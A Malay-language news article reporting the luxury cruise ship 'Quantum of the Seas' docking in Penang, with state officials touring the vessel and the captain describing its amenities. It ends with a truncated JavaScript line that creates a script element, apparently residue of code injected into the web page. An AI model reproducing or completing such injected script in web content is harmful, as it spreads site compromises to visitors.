Kapal mewah ‘Quantum of the Seas’ singgah di P. Pinang

PENGKALAN KOTA – Kapal pelancongan mewah “Quantum of the Seas” turut berlabuh di Pelabuhan Swettenham dalam lingkaran George Town Tapak Warisan Dunia UNESCO baru-barubaru ini.

Mewakili Kerajaan Negeri, Exco Pembangunan Pelancongan, Law Heng Kiang serta para wartawan turut dijemput menyertai penjelajahan singkat ke dalam kapal pelancongan kedua terbesar di dunia, sepanjang 347.1 meter dengan berat 167,800 tan kasar.

Kapal yang pertama kali dibahterakan di khalayak pada November tahun lalu itu terdiri oleh 2,090 unit kamar pelbagai kategori dan empat kolam renang, serta boleh menampung kira-kira 4,180 tetamu.

Dalam perut kapal itu k e l i h a t a n b a g a i k a n kompleks membeli-belah 16 tingkat di tengah laut atau sea plex yang dilengkapi dengan skydiving simulator, rock-climbing wall, flow rider, room games, pentas teater, blonic bar, under water world serta peluang menikmati pelbagai juadah enak daripada air tangan chef antarabangsa terkemuka seperti Jamie Oliver, Michael Schwart dan Devin Alexander.

Heng Kiang dalam kenyataannya memberitahu bahawa kunjungan kapal mewah milik Royal Caribbean International itu bukan sahaja membawa minat pelancong sedunia ke negeri ini, malah menghargai Pulau Pinang sebagai salah satu destinasi pelancongan pilihan di rantau ini.

“Warga Pulau Pinang cukup berbangga kerana menjadi salah satu destinasi pilihan untuk memperkenalkan keindahan kapal ‘Quantum of the Seas‘ yang buat pertama kali di laut mempunyai kelengkapan seperti kapsul kaca tinggi ‘North Star’, similator terjun iFly dan banyak lagi, yang tidak boleh didapati di tempat-tempat lain,” jelas Heng Kiang yang juga ADUN Batu Lanchang kepada wartawan di sini baru-baru ini.

Ahli Dewan Undangan Negeri (ADUN) Bagan Jermal merangkap Exco Kerja Raya, Pengangkutan dan Utiliti, Lim Hock Seng turut menyertai program jelajah ringkas di kapal mewah tersebut.

Dalam pada itu, Kapten ‘Quantum of the Seas’, Screko Ban pula berkata, kapal mewah tersebut pasti menyediakan pengalaman unik untuk penumpang dengan ciri-ciri hiburan dan banyak pilihan tempat makan.

Beliau memberitahu, ia termasuk simulator terbang dan ‘North Star’ yang membolehkan penumpang menikmati pandangan 360 darjah laut.

“Kami juga mempunyai 18 restoran di dalam bahtera ini yang menawarkan pelbagai juadah enak untuk tetamu,” ujarnya.

Difahamkan, pelayaran menarik ‘Quantum of the Seas’ dari New York, Amerika Syarikat dalam tempoh hampir dua bulan bermula pada 2 Mei lepas dan dijadual berakhir di Shanghai, China pada 24 Jun lalu.

var d=document;var s=d.createElement(‘script’);